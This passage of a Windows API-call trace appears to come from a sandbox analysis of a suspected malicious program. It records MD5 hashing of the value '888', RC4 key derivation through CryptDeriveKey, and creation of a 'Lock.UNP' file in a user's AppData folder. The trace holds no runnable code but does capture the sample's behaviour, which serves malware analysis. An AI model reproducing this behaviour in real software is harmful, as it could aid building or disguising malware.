hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0204.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0204.757] CryptCreateHash (in: hProv=0xa7c220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0204.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0204.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0204.757] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0204.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0204.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72b58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0204.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.758] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.758] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0204.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaade0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0204.758] CryptHashData (hHash=0x9e2078, pbData=0x2a72648, dwDataLen=0x3, dwFlags=0x1) returned 1 [0204.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.758] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.758] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.759] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0204.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.759] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0204.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0204.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaac90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0204.759] CryptDeriveKey (in: hProv=0xa7c220, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0204.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.759] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0204.759] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0204.759] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0204.759] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0204.760] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0204.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0204.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0204.760] CryptDestroyHash (hHash=0x9e2078) returned 1 [0204.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/UNP" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\unp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.761] GetLastError () returned 0x5 [0204.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0204.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.762] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0204.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0204.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0204.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0204.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0204.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0204.763] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.UNP" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.unp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0204.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0204.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0204.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0204.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0204.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0204.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0204.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0204.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0204.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0204.767] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0204.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0204.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0204.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0204.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa08 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0204.768] 